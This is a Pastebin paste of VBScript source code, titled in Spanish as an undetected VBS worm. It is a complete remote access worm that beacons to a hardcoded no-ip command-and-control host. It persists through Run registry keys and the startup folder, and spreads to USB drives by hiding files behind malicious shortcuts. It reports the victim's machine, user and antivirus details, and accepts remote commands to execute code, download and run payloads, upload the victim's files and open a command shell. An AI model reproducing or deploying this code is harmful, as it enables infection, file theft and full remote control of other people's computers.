dansguardian

VBS WORM (no detectado) codigo fuente

Sep 3rd, 2013
599
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2.  
  3. host = "hattouma12.no-ip.biz"
  4. port = 88
  5. installdir = "%temp%"
  6. lnkfile = true
  7. lnkfolder = true
  8.  
  9. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
  10.  
  11. dim shellobj
  12. set shellobj = wscript.createobject("wscript.shell")
  13. dim filesystemobj
  14. set filesystemobj = createobject("scripting.filesystemobject")
  15. dim httpobj
  16. set httpobj = createobject("msxml2.xmlhttp")
  17.  
  18.  
  19. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
  20.  
  21. installname = wscript.scriptname
  22. startup = shellobj.specialfolders ("startup") & "\"
  23. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  24. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  25. spliter = "<|>"
  26. sleep = 5000
  27. dim response
  28. dim cmd
  29. dim param
  30. info = ""
  31. usbspreading = ""
  32. startdate = ""
  33. dim oneonce
  34.  
  35. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
  36. on error resume next
  37.  
  38.  
  39. instance
  40. while true
  41.  
  42. install
  43.  
  44. response = ""
  45. response = post ("is-ready","")
  46. cmd = split (response,spliter)
  47. select case cmd (0)
  48. case "excecute"
  49.       param = cmd (1)
  50.       execute param
  51. case "update"
  52.       param = cmd (1)
  53.       oneonce.close
  54.       set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
  55.       oneonce.write param
  56.       oneonce.close
  57.       shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  58.       wscript.quit
  59. case "uninstall"
  60.       uninstall
  61. case "send"
  62.       download cmd (1),cmd (2)
  63. case "site-send"
  64.       sitedownloader cmd (1),cmd (2)
  65. case "recv"
  66.       param = cmd (1)
  67.       upload (param)
  68. case  "enum-driver"
  69.       post "is-enum-driver",enumdriver  
  70. case  "enum-faf"
  71.       param = cmd (1)
  72.       post "is-enum-faf",enumfaf (param)
  73. case  "enum-process"
  74.       post "is-enum-process",enumprocess  
  75. case  "cmd-shell"
  76.       param = cmd (1)
  77.       post "is-cmd-shell",cmdshell (param)  
  78. case  "delete"
  79.       param = cmd (1)
  80.       deletefaf (param)
  81. case  "exit-process"
  82.       param = cmd (1)
  83.       exitprocess (param)
  84. case  "sleep"
  85.       param = cmd (1)
  86.       sleep = eval (param)        
  87. end select
  88.  
  89. wscript.sleep sleep
  90.  
  91. wend
  92.  
  93.  
  94. sub install
  95. on error resume next
  96. dim lnkobj
  97. dim filename
  98. dim foldername
  99. dim fileicon
  100. dim foldericon
  101.  
  102. upstart
  103. for each drive in filesystemobj.drives
  104.  
  105. if  drive.isready = true then
  106. if  drive.freespace  > 0 then
  107. if  drive.drivetype  = 1 then
  108.     filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  109.     if  filesystemobj.fileexists (drive.path & "\" & installname)  then
  110.         filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
  111.     end if
  112.     for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  113.         if not lnkfile then exit for
  114.         if  instr (file.name,".") then
  115.             if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  116.                 file.attributes = 2+4
  117.                 if  ucase (file.name) <> ucase (installname) then
  118.                     filename = split(file.name,".")
  119.                     set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
  120.                     lnkobj.windowstyle = 7
  121.                     lnkobj.targetpath = "cmd.exe"
  122.                     lnkobj.workingdirectory = ""
  123.                     lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  124.                     fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  125.                     if  instr (fileicon,",") = 0 then
  126.                         lnkobj.iconlocation = file.path
  127.                     else
  128.                         lnkobj.iconlocation = fileicon
  129.                     end if
  130.                     lnkobj.save()
  131.                 end if
  132.             end if
  133.         end if
  134.     next
  135.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  136.         if not lnkfolder then exit for
  137.         folder.attributes = 2+4
  138.         foldername = folder.name
  139.         set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
  140.         lnkobj.windowstyle = 7
  141.         lnkobj.targetpath = "cmd.exe"
  142.         lnkobj.workingdirectory = ""
  143.         lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  144.         foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  145.         if  instr (foldericon,",") = 0 then
  146.             lnkobj.iconlocation = folder.path
  147.         else
  148.             lnkobj.iconlocation = foldericon
  149.         end if
  150.         lnkobj.save()
  151.     next
  152. end If
  153. end If
  154. end if
  155. next
  156. err.clear
  157. end sub
  158.  
  159. sub uninstall
  160. on error resume next
  161. dim filename
  162. dim foldername
  163.  
  164. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  165. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  166. filesystemobj.deletefile startup & installname ,true
  167. filesystemobj.deletefile wscript.scriptfullname ,true
  168.  
  169. for  each drive in filesystemobj.drives
  170. if  drive.isready = true then
  171. if  drive.freespace  > 0 then
  172. if  drive.drivetype  = 1 then
  173.     for  each file in filesystemobj.getfolder ( drive.path & "\").files
  174.          on error resume next
  175.          if  instr (file.name,".") then
  176.              if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  177.                  file.attributes = 0
  178.                  if  ucase (file.name) <> ucase (installname) then
  179.                      filename = split(file.name,".")
  180.                      filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  181.                  else
  182.                      filesystemobj.deletefile (drive.path & "\" & file.name)
  183.                  end If
  184.              else
  185.                  filesystemobj.deletefile (file.path)
  186.              end if
  187.          end if
  188.      next
  189.      for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  190.          folder.attributes = 0
  191.      next
  192. end if
  193. end if
  194. end if
  195. next
  196. wscript.quit
  197. end sub
  198.  
  199. function post (cmd ,param)
  200.  
  201. post = param
  202. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  203. httpobj.setrequestheader "user-agent:",information
  204. httpobj.send param
  205. post = httpobj.responsetext
  206. end function
  207.  
  208. function information
  209. on error resume next
  210. if  inf = "" then
  211.     inf = hwid & spliter
  212.     inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
  213.     inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
  214.  
  215.     set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  216.     set os = root.execquery ("select * from win32_operatingsystem")
  217.     for each osinfo in os
  218.        inf = inf & osinfo.caption & spliter  
  219.        exit for
  220.     next
  221.     inf = inf & "plus" & spliter
  222.     inf = inf & security & spliter
  223.     inf = inf & usbspreading
  224.     information = inf  
  225. else
  226.     information = inf
  227. end if
  228. end function
  229.  
  230.  
  231. sub upstart ()
  232. on error resume Next
  233.  
  234. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  235. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  236. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  237. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  238.  
  239. end sub
  240.  
  241.  
  242. function hwid
  243. on error resume next
  244.  
  245. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  246. set disks = root.execquery ("select * from win32_logicaldisk")
  247. for each disk in disks
  248.     if  disk.volumeserialnumber <> "" then
  249.         hwid = disk.volumeserialnumber
  250.         exit for
  251.     end if
  252. next
  253. end function
  254.  
  255.  
  256. function security
  257. on error resume next
  258.  
  259. security = ""
  260.  
  261. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  262. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  263. for each objitem in colitems
  264.     versionstr = split (objitem.version,".")
  265. next
  266. versionstr = split (colitems.version,".")
  267. osversion = versionstr (0) & "."
  268. for  x = 1 to ubound (versionstr)
  269.      osversion = osversion &  versionstr (i)
  270. next
  271. osversion = eval (osversion)
  272. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  273.  
  274. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  275. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  276.  
  277. for each objantivirus in colantivirus
  278.     security  = security  & objantivirus.displayname & " ."
  279. next
  280. if security  = "" then security  = "nan-av"
  281. end function
  282.  
  283.  
  284. function instance
  285. on error resume next
  286.  
  287. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  288. if usbspreading = "" then
  289.    if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
  290.       usbspreading = "true - " & date
  291.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  292.    else
  293.       usbspreading = "false - " & date
  294.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  295.  
  296.    end if
  297. end If
  298.  
  299.  
  300.  
  301. upstart
  302. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
  303. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
  304. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  305.     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  306.     wscript.quit
  307. end If
  308. err.clear
  309. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
  310. if  err.number > 0 then wscript.quit
  311. end function
  312.  
  313.  
  314. sub sitedownloader (fileurl,filename)
  315.  
  316. strlink = fileurl
  317. strsaveto = installdir & filename
  318. set objhttpdownload = createobject("msxml2.xmlhttp" )
  319. objhttpdownload.open "get", strlink, false
  320. objhttpdownload.send
  321.  
  322. set objfsodownload = createobject ("scripting.filesystemobject")
  323. if  objfsodownload.fileexists (strsaveto) then
  324.     objfsodownload.deletefile (strsaveto)
  325. end if
  326.  
  327. if objhttpdownload.status = 200 then
  328.    dim  objstreamdownload
  329.    set  objstreamdownload = createobject("adodb.stream")
  330.    with objstreamdownload
  331.         .type = 1
  332.         .open
  333.         .write objhttpdownload.responsebody
  334.         .savetofile strsaveto
  335.         .close
  336.    end with
  337.    set objstreamdownload = nothing
  338. end if
  339. if objfsodownload.fileexists(strsaveto) then
  340.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
  341. end if
  342. end sub
  343.  
  344. sub download (fileurl,filedir)
  345.  
  346. if filedir = "" then
  347.    filedir = installdir
  348. end if
  349.  
  350. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
  351. set objhttpdownload = createobject("msxml2.xmlhttp")
  352. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
  353. objhttpdownload.send ""
  354.      
  355. set objfsodownload = createobject ("scripting.filesystemobject")
  356. if  objfsodownload.fileexists (strsaveto) then
  357.     objfsodownload.deletefile (strsaveto)
  358. end if
  359. if  objhttpdownload.status = 200 then
  360.     dim  objstreamdownload
  361.     set  objstreamdownload = createobject("adodb.stream")
  362.     with objstreamdownload
  363.          .type = 1
  364.          .open
  365.          .write objhttpdownload.responsebody
  366.          .savetofile strsaveto
  367.          .close
  368.     end with
  369.     set objstreamdownload  = nothing
  370. end if
  371. if objfsodownload.fileexists(strsaveto) then
  372.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
  373. end if
  374. end sub
  375.  
  376.  
  377. function upload (fileurl)
  378.  
  379. dim  httpobj,objstreamuploade,buffer
  380. set  objstreamuploade = createobject("adodb.stream")
  381. with objstreamuploade
  382.      .type = 1
  383.      .open
  384.      .loadfromfile fileurl
  385.      buffer = .read
  386.      .close
  387. end with
  388. set objstreamdownload = nothing
  389. set httpobj = createobject("msxml2.xmlhttp")
  390. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
  391. httpobj.send buffer
  392. end function
  393.  
  394.  
  395. function enumdriver ()
  396.  
  397. for  each drive in filesystemobj.drives
  398. if   drive.isready = true then
  399.      enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
  400. end if
  401. next
  402. end Function
  403.  
  404. function enumfaf (enumdir)
  405.  
  406. enumfaf = enumdir & spliter
  407. for  each folder in filesystemobj.getfolder (enumdir).subfolders
  408.      enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
  409. next
  410.  
  411. for  each file in filesystemobj.getfolder (enumdir).files
  412.      enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter
  413.  
  414. next
  415. end function
  416.  
  417.  
  418. function enumprocess ()
  419.  
  420. on error resume next
  421.  
  422. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  423. set colitems = objwmiservice.execquery("select * from win32_process",,48)
  424.  
  425. dim objitem
  426. for each objitem in colitems
  427.     enumprocess = enumprocess & objitem.name & "|"
  428.     enumprocess = enumprocess & objitem.processid & "|"
  429.     enumprocess = enumprocess & objitem.executablepath & spliter
  430. next
  431. end function
  432.  
  433. sub exitprocess (pid)
  434. on error resume next
  435.  
  436. shellobj.run "taskkill /F /T /PID " & pid,7,true
  437. end sub
  438.  
  439. sub deletefaf (url)
  440. on error resume next
  441.  
  442. filesystemobj.deletefile url
  443. filesystemobj.deletefolder url
  444.  
  445. end sub
  446.  
  447. function cmdshell (cmd)
  448.  
  449. dim httpobj,oexec,readallfromany
  450.  
  451. set oexec = shellobj.exec ("%comspec% /c " & cmd)
  452. if not oexec.stdout.atendofstream then
  453.    readallfromany = oexec.stdout.readall
  454. elseif not oexec.stderr.atendofstream then
  455.    readallfromany = oexec.stderr.readall
  456. else
  457.    readallfromany = ""
  458. end if
  459.  
  460. cmdshell = readallfromany
  461. end function
Add Comment
Please, Sign In to add comment